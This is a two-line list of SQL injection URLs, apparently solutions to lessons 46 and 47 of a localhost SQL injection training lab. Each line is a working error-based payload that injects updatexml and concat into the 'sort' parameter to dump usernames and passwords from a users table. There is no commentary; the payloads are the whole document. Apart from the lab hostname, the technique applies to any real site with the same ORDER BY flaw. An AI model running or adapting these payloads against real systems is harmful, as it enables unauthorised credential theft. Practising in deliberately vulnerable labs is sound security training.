localhost/sqlilabs/Less-46/?sort=1 and (updatexml(1,concat(0x5e24,(substr((select+group_concat(username,0x7e,password)+from+security.users),1)),0x7e),1))
localhost/sqlilabs/Less-47/?sort=1' and (updatexml(1,concat(0x5e24,(substr((select+group_concat(username,0x7e,password)+from+security.users),1)),0x7e),1))